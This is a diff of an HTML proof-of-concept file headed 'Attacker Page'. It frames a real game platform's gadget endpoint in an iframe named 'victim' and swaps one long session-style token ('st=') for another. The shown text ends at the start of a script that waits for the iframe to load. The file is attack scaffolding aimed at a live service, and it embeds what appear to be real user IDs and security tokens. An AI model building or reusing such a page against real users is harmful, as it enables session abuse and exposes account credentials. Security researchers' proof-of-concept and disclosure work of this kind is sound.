--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=wQDTtZEVqIWN3v06jId5tJ2pZvic1raEsEPpmGrs5CMoSNYaxGHV8Ewgm2864tbDzS7M%2FeLEwJB0gk1AJ7fsAMWf0JpCP4YrwHmlzqxlAz0GvnAfwwnXU0zaJLjDzrzddhW7MJpaqRtWh%2B26ZZspNqhQ06Q%2F0YwC1huVIp377NzmttAaSy8%2FcsqnDRy%2BWEacb7uu5%2BPfURzzMnkT17zssmDuCg2r%2BR2nRkss2mavpR27SNdzlUavEzB%2BnbPgjZwLNr903HrWBUHpve24e36RgQJlRDc%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=doCs%2FD9Gti7ZRtiavsCyEO9buzKLsw2mU5ok6grJT%2BDT67OVNKVxdbXB6HRUQv1OIa6TgHLAcx%2FJDaOPYc2fzgIIdFqSyyQL%2B3L%2BC2wDABbxUpYMwgjpCOHuv0RnL3No49QzVrcza4fKzsPBPMsCoIluno9KpqV%2FMJoUgjNViaNAkyKQdp1aHwKfZbhEKHJNAyupl443QPtHdLzIvG5%2FZ1XBIFMGD%2ByXoJLGHe8UfYy8H90SZjHds2nFb8fzEiX2eD3xNwsaT%2FSehbi2wQB5CagOlR4%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
